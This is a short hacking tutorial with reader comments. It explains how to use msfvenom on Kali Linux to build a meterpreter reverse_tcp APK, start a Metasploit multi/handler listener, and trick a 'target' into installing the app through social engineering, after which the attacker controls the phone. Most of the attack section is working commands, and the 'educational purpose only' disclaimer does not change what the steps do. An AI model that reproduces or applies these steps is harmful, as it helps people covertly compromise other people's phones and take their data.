Hello, Guys..!! Today we are going to learn Android Hacking with kali Linux.As each day I am receiving the profusion of request for an android hacking tutorial so today it’s finally here.
so Let’s unleash the kraken.. 😉
Note: This tutorial is for Educational purpose only..!!
MSFvenom:
MSFvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.
STEPS :
1. Fire Up kali Linux and open command terminal and type:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 R > MB.apk • -p => Specify Payload • LHOST => Your IP* • LPORT => Port You want to listen on • R => Means RAW Format • >/root/Desktop/MB.apk => Location for File My kali OS ip is 192.168.1.7|output app created will be MB.apk
2. Now type “msfconsole” in Kali terminal to start Metasploit framework.
3.Great,now it’s time to open and setup multi-handler.
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.7 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit
Payload Handler is being started……..
4.Now send the MB.apk file to your target ( social engineering will be required) and when your target will click the apk file;Â meterpreter session will be established.
Yeah, that’s Android 6.0  aka  Marshmallow folks;)
Well, you have compromised an Android cell phone now and that android phone is now in your control.You can perform a lot of stuff on that.i.e.
Happy Learning:)
Very Useful Thank you sir…
THE apk file which gets created is of size 0 bytes. it’s not opening also